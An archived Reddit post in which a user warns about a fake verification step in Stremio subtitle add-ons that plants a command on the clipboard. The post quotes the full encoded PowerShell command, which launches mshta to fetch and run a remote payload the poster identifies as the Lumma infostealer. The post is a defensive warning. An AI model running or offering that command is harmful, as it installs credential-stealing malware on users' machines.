This is an automated archive made by the Lemmit Bot.
The original was posted on /r/piracy by /u/MagicAnes on 2024-08-23 10:15:37+00:00.
Hey everyone,
I wanted to share a recent experience I had with Stremio, hoping it might save some of you from getting hacked. I was browsing the community add-ons in Stremio and saw the OpenSubtitles and Subscene add-ons. I thought they might come in handy for subtitles, so I decided to configure them.
The setup seemed easy – just follow the on-screen instructions. I selected the language for the subtitles, but when I tried to install the add-on, it prompted me to complete some sort of verification step. The instructions were simple:
- Press Win + R
- Press Ctrl + V
- Click OK
I pressed Ctrl + V and was surprised to see the following code appear, even though I hadn’t copied anything myself:
"powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==" Don't excute it
This seemed strange, so I decided to investigate. When I scanned the code, I found that it was a PowerShell command with an encoded payload.
Here's what I found:
-**eC**: This parameter tells PowerShell to execute a command that is provided in encoded form (Base64 encoded).- The decoded command using Base64 is:
mshta ""
What This Command Does:
- mshta: Launches the Microsoft HTML Application Host, which can execute HTML applications (HTA files).
- "": This URL is opened by the command, which can potentially execute harmful code hosted on the page.
Downloading the file from this link gives you an .exe file named "DIALER.EXE". I scanned this file using VirusTotal, and it showed that 50 out of 57 antivirus engines detected it as Trojan.LummaStealer/Mikey.
You can see the VirusTotal report here: [VirusTotal Link]
Please be careful when installing any community add-ons on anything and double-check any verification steps they ask you to complete by scanning the URL, files.
Stay safe everyone!